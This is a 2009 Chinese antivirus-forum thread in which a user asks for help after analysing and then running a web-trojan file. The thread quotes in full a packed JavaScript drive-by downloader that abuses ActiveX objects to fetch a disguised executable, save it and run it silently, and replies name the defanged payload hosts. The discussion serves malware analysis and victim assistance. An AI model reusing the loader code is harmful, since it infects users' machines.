瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 自搞乌龙
smztsmzt - 2009-6-24 23:59:00
自己用freshow分析网站http://www.czgfy.com/xi/x.htm的时候,分析了http://www.czgfy.com/xi/1.htm内容
其中网页加密如下
<script src=1.css></script>
<script src=15.js></script>
<script src=16.js></script>
<script language="JavaScript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1Z 20(1h){5 1H=15["M"+"a"+"1E"]["r"+"a"+"n"+"d"+"o"+"m"]()*1h;1Q\'L\'+\'.1I\'}1B{5 z,H,D,g,x;5 19=\'V.Q\';5 Z=\'V.1T\';5 f=15["d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"]["c"+"1F"+"1k"+"1n"+"1c"+"1m"+"1j"]("o"+"b"+"j"+"e"+"c"+"t");5 R="1i";5 1e=R+"s"+"1A:";5 1b="0-"+"9"+"8"+"3"+"A"+"-"+"0";5 1d="0"+"C"+"0"+"4";5 10="F"+"C"+"2"+"9"+"E"+"3"+"6";5 k="1t"+"1s";5 1g="1r"+"-1p"+"-1q";5 k=1e+k+1g+1b+1d+10;f["1u"]("1v",k);5 w$y=f["v"]("1z.1o","");5 q=f["v"](1y,"");5 7;7=f.v(1x,"");7.Y=1;5 J=w$y.N(2);5 U=w$y.N(0);5 K;K=f["C"+"r"+"e"+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](1w,"");14=w$y["B"+"u"+"i"+"l"+"d"+"P"+"a"+"t"+"h"](U+\'\\\\1l\',\'X.Q\');g=J+"[url=]\\\\"+19;q.17("G"+"E"+"T",L,0);q["s"+"e"+"n"+"d"]();7["17"]();7["W"+"1X"+"1V"](q["1U"+"1S"]);7["S"+"a"+"1Y"+"T"+"25"+"24"+"e"](g,2);7["1f"]();5[/url] 23="f";x=J+"[url=]\\\\"+Z;5[/url] I;I="22 g = v([url=file://\\]\\"1R.";z="1G\\")"+"\\n";H="g.1C[/url] [url=file://\\]\\"X[/url] /c "+g+"[url=file://\\]\\",1D";D=I+z+H;7["Y"]=2;7["O"+"p"+"e"+"n"]();7["1J"+"1O"+"1P"+"1N"]=D;7["1M"+"1K"+"1L"+"1c"](x,2);7["1f"]();5[/url] 13="o";5 1a="p";5 12="e";5 11="n";5 18=13+1a+12+11;K.21(14,\' /c \'+x,"",18,0)}1W(16){16=1}',62,130,'|||||var||baidu3||||||||chilam|wwwbaiducn||||baidueex||||||baidu2|||||CreateObject|hHf|wwwbaiducn2|R6|baiduzf||||baiduzfx||||baiduzfs|baiduzf0|VgDnZXHt7|YuTYuT|baidu||GetSpecialFolder|||exe|nod3232|||VgDnZXHt9|svchost||cmd|type|baidunames|baidueesss|baidussss|baidusss|baidus|exp1|window|baidusave|Open|baidux|baiduname|baiduss|baiduees|le|baidueess|baiduee|Close|baidueexx|rRaGEykU1|cL|nt|at|system32|me|eE|FileSystemObject|65A3|11D|556|96C|BD|setAttribute|classid|YuTx|baiduado|baiduxml|Scripting|id|try|run|vbhide|th|re|Shell|Orh2|Cn|Wr|eto|fi|Sav|xt|ite|Te|return|Wscript|seBody|vbs|respon|te|catch|ri|ve|function|gn|ShelLExeCute|Set|baiduuser|il|oF'.split('|'),0,{}))
</script>

自己下载了1.CSS后,改后缀名为exe,运行文件消失,估计是病毒一类的,疏忽大意了,谁能分析一下,这个病毒,当时没有开虚拟,瑞星最新版没有反应,后来瑞星无法启动

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
jgjf - 2009-6-25 0:18:00
?????不懂
networkedition - 2009-6-25 9:14:00
那个1.css最终的网马是:hxxp://cav.xl.cx/v.css
竹本无ベ - 2009-6-25 12:50:00
hxxp://www.czgfy.com/xi/1.css地址还不是最终挂马地址,最终挂马地址为:hxxp://mvt.ht.cx/a.css,该css文件才是可执行文件。
networkedition - 2009-6-25 13:38:00
更新的真快呀:kaka6:
smztsmzt - 2009-6-28 0:13:00
我下载的是一个v.css,现在发现中毒后的结果:瑞星被秒杀,真正的秒杀,监控无法打开,无法点击杀毒,所有软件印映象劫持到ntsd.exe,然后全盘感染,重装没有作用,无法进入安全模式,而且用PE系统进入后居然发现病毒还写在了系统隐藏的b分区,手动杀毒找不到思路,用autorun看到系统被改的乱七八糟,怎么办呀,各位
竹本无ベ - 2009-6-28 21:13:00
你真牛,实机测试。能实机测试的,一定有办法解决的。
networkedition - 2009-6-29 10:18:00
反病毒区求助,上传sreng日志
smztsmzt - 2009-7-1 0:40:00
用PE格式C盘后在装好的,恩,都劫持了,兄弟你让我怎么拿日志啊,而且貌似不是很弱的病毒,
networkedition - 2009-7-1 9:18:00
使用pe格式c盘装好系统后,不要做任何操作(包括打开其他分区),只需将杀毒软件安装好,升级到最新版全盘杀毒。
smztsmzt - 2009-7-1 13:03:00
networkedition 说的对,杀了毒,装了一个防火墙,惨痛的经历
1
查看完整版本: 自搞乌龙